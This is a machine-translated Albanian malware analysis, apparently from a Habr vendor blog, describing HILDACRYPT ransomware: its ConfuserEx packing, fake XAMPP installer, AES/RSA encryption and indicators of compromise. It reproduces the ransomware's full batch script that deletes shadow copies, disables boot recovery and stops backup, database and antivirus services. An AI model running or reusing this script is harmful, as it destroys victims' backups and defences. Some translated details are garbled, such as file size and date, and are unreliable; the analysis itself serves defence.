HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Përshëndetje, Habr! Edhe një herë, ne po flasim për versionet më të fundit të malware nga kategoria Ransomware. HILDACRYPT është një ransomware i ri, një anëtar i familjes Hilda i zbuluar në gusht 2019, i quajtur sipas filmit vizatimor Netflix që u përdor për shpërndarjen e softuerit. Sot po njihemi me veçoritë teknike të këtij virusi të përditësuar ransomware.

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Në versionin e parë të Hilda ransomware, një lidhje me një të postuar në Youtube rimorkio Seriali vizatimor përmbahej në letrën e shpërblesës. HILDACRYPT maskohet si një instalues ​​legjitim i XAMPP, një shpërndarje Apache e lehtë për t'u instaluar që përfshin MariaDB, PHP dhe Perl. Në të njëjtën kohë, kriptolocker ka një emër të ndryshëm skedari - xamp. Për më tepër, skedari i ransomware nuk ka një nënshkrim elektronik.

Analiza statike

ransomware gjendet në një skedar PE32 .NET të shkruar për MS Windows. Madhësia e tij është 135 byte. Si kodi kryesor i programit ashtu edhe kodi i programit mbrojtës janë të shkruar në C#. Sipas datës dhe vulës kohore të përpilimit, binar u krijua më 168 shtator 14.

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Sipas Detect It Easy, ransomware është arkivuar duke përdorur Confuser dhe ConfuserEx, por këta pengues janë të njëjtë si më parë, vetëm ConfuserEx është pasardhësi i Confuser, kështu që nënshkrimet e tyre të kodit janë të ngjashme.

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

HILDACRYPT është me të vërtetë i paketuar me ConfuserEx.

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Vektori i sulmit

Me shumë mundësi, ransomware u zbulua në një nga faqet e programimit në internet, duke u maskuar si një program legjitim XAMPP.

I gjithë zinxhiri i infeksionit mund të shihet në app.any.run sandbox.

Errësim

Vargjet e ransomware ruhen në formë të koduar. Kur lëshohet, HILDACRYPT i deshifron ato duke përdorur Base64 dhe AES-256-CBC.

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Instalim

Para së gjithash, ransomware krijon një dosje në %AppDataRoaming% në të cilën gjenerohet rastësisht parametri GUID (Globally Unique Identifier). Duke shtuar një skedar bat në këtë vendndodhje, virusi ransomware e lëshon atë duke përdorur cmd.exe:

cmd.exe /c JKfgkgj3hjgfhjka.bat & dalje

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirusHILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus
Më pas fillon të ekzekutojë një skript grumbull për të çaktivizuar veçoritë ose shërbimet e sistemit.

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Skripti përmban një listë të gjatë komandash që shkatërrojnë kopjet në hije, çaktivizojnë serverin SQL, kopje rezervë dhe zgjidhje antivirus.

Për shembull, ai përpiqet pa sukses të ndalojë shërbimet e Acronis Backup. Përveç kësaj, ai sulmon sistemet rezervë dhe zgjidhjet antivirus nga shitësit e mëposhtëm: Veeam, Sophos, Kaspersky, McAfee dhe të tjerë.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

Pasi shërbimet dhe proceset e përmendura më sipër çaktivizohen, kriptolokeri mbledh informacione për të gjitha proceset që ekzekutohen duke përdorur komandën e listës së detyrave për të siguruar që të gjitha shërbimet e nevojshme janë të paaftë.
listë detyrash v/fo csv

Kjo komandë shfaq një listë të detajuar të proceseve të ekzekutimit, elementët e të cilave ndahen me shenjën ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Pas këtij kontrolli, ransomware fillon procesin e kriptimit.

encryption

Kriptimi i skedarit

HILDACRYPT kalon nëpër të gjitha përmbajtjet e gjetura të hard disqeve, me përjashtim të dosjeve Recycle.Bin dhe Reference AssembliesMicrosoft. Ky i fundit përmban skedarë kritikë dll, pdb, etj. për aplikacionet .Net që mund të ndikojnë në funksionimin e ransomware. Për të kërkuar skedarë që do të kodohen, përdoret lista e mëposhtme e shtesave:

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

ransomware përdor algoritmin AES-256-CBC për të enkriptuar skedarët e përdoruesve. Madhësia kryesore është 256 bit dhe madhësia e vektorit të inicializimit (IV) është 16 bajt.

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Në pamjen e mëposhtme të ekranit, vlerat e byte_2 dhe byte_1 u morën rastësisht duke përdorur GetBytes().

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Ключ

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

N AND DHE

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Skedari i koduar ka shtrirjen HCY!.. Ky është një shembull i një skedari të koduar. Çelësi dhe IV i përmendur më sipër u krijuan për këtë skedar.

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Kriptimi i çelësit

Kriptolokuesi ruan çelësin e gjeneruar AES në një skedar të koduar. Pjesa e parë e skedarit të koduar ka një kokë që përmban të dhëna të tilla si HILDACRYPT, KEY, IV, FileLen në formatin XML dhe duket si kjo:

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Kriptimi i çelësave AES dhe IV bëhet duke përdorur RSA-2048, dhe kodimi bëhet duke përdorur Base64. Çelësi publik RSA ruhet në trupin e kriptolokerit në një nga vargjet e koduara në formatin XML.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

Një çelës publik RSA përdoret për të enkriptuar çelësin e skedarit AES. Çelësi publik RSA është i koduar Base64 dhe përbëhet nga një modul dhe një eksponent publik prej 65537. Deshifrimi kërkon çelësin privat RSA, të cilin sulmuesi e ka.

Pas kriptimit RSA, çelësi AES kodohet duke përdorur Base64 të ruajtur në skedarin e koduar.

Mesazh shpërblesë

Pasi kriptimi të përfundojë, HILDACRYPT shkruan skedarin html në dosjen në të cilën ka koduar skedarët. Njoftimi i ransomware përmban dy adresa emaili ku viktima mund të kontaktojë sulmuesin.

HILDACRYPT: ransomware i ri godet sistemet rezervë dhe zgjidhjet antivirus

Njoftimi i zhvatjes përmban gjithashtu rreshtin "Jo loli është i sigurt;)" - një referencë për personazhet anime dhe manga me pamjen e vajzave të vogla të ndaluara në Japoni.

Prodhim

HILDACRYPT, një familje e re ransomware, ka lëshuar një version të ri. Modeli i enkriptimit e pengon viktimën të deshifrojë skedarët e koduar nga ransomware. Cryptolocker përdor metoda aktive të mbrojtjes për të çaktivizuar shërbimet e mbrojtjes që lidhen me sistemet rezervë dhe zgjidhjet antivirus. Autori i HILDACRYPT është një fans i serialit të animuar Hilda të shfaqur në Netflix, lidhja me trailerin e të cilit ishte në letrën e blerjes për versionin e mëparshëm të programit.

Si zakonisht, Rezervimi i Acronis и Acronis True Image mund të mbrojnë kompjuterin tuaj nga ransomware HILDACRYPT dhe ofruesit kanë aftësinë të mbrojnë klientët e tyre me Acronis Backup Cloud. Mbrojtja sigurohet nga fakti që këto zgjidhje përfshijnë Siguria kibernetike përfshin jo vetëm kopje rezervë, por edhe sistemin tonë të integruar të sigurisë Mbrojtja aktive Acronis - Mundësuar nga një model i mësimit të makinerive dhe i bazuar në heuristikat e sjelljes, një teknologji që është e aftë të kundërshtojë kërcënimin e ransomware-it zero-ditor si askush tjetër.

treguesit e kompromisit

Zgjatja e skedarit HCY!
HILDACRYPTReadMe.html
xamp.exe me një shkronjë "p" dhe pa nënshkrim dixhital
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

Burimi: www.habr.com

Shto një koment